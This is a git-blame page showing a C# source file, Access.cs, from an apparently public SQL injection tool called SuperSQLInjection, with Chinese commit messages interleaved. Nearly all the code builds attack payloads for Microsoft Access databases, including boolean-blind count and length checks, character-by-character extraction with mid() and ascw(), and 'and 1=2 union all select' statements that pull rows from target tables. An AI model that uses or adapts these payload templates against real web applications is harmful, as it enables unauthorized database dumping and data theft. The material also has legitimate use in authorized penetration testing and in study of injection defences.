shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
SuperSQLInjectionV1/SuperSQLInjection/payload/Access.cs

81 lines
3.0 KiB
C#
Raw Permalink Normal View History

添加项目文件。
2017-03-13 16:12:15 +08:00
using System;
using System.Collections.Generic;
using System.Text;
namespace SuperSQLInjection.payload
{
class Access
{
update20190107 20190107 V1.0 正式版--- 修复PostgreSQL环境变量文件名称配置错误,导致无法正确加载环境变量配置。 新增优化代理功能,可在代理中心设置Socks5/HTTSP/HTTPS代理,可以固定单个代理,也可能从代理次中随机选择。
2019-01-07 21:53:30 +08:00
public static List<String> vers = null;
添加项目文件。
2017-03-13 16:12:15 +08:00
//获取数据条数
update20190823 update20190823
2019-08-23 16:34:43 +08:00
public static String data_count = "(select count(1) from {table})";
添加项目文件。
2017-03-13 16:12:15 +08:00
//判断条数
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_datas_count = " " + data_count + ">={len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
public static String substr = "mid(({data}),{index},1)";
//bool方式字符长度判断
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_length = " len({data})>{len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_value = " {data}>{len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
//获取行数据
public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from {table} order by {orderby} asc) t order by t.{orderby} desc)";
//union获取值
public static String union_value = " and 1=2 union all select {data} from {table}";
//多字符
public static String unicode_value = "ascw(mid({data},{index},1))";
更新版本 更新版本
2018-08-21 15:43:31 +08:00
public static String getUnionDataValue(int columnsLen, int showIndex,String Fill,List<String> columns, String table, String index)
添加项目文件。
2017-03-13 16:12:15 +08:00
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)&chr(94)&chr(33)&" + Comm.unionColumns(columns, "&chr(36)&chr(36)&chr(36)&") + "&chr(33)&chr(94)&chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index).Replace("{orderby}", columns[0]));
sb.Append(",");
}
else
{
更新版本 更新版本
2018-08-21 15:43:31 +08:00
sb.Append(Fill+",");
添加项目文件。
2017-03-13 16:12:15 +08:00
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
更新版本 更新版本
2018-08-21 15:43:31 +08:00
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
添加项目文件。
2017-03-13 16:12:15 +08:00
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append("(chr(94)&chr(94)&chr(33)&" + dataPayLoad + "&chr(33)&chr(94)&chr(94)),");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getBoolDataPayLoad(String column,List<String> columns,String dbName, String table, int index)
{
String data = data_value.Replace("{data}",column).Replace("{allcolumns}",Comm.unionColumns(columns,",")).Replace("{orderby}",columns[0]);
String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
return payload;
}
}
}
Reference in New Issue Copy Permalink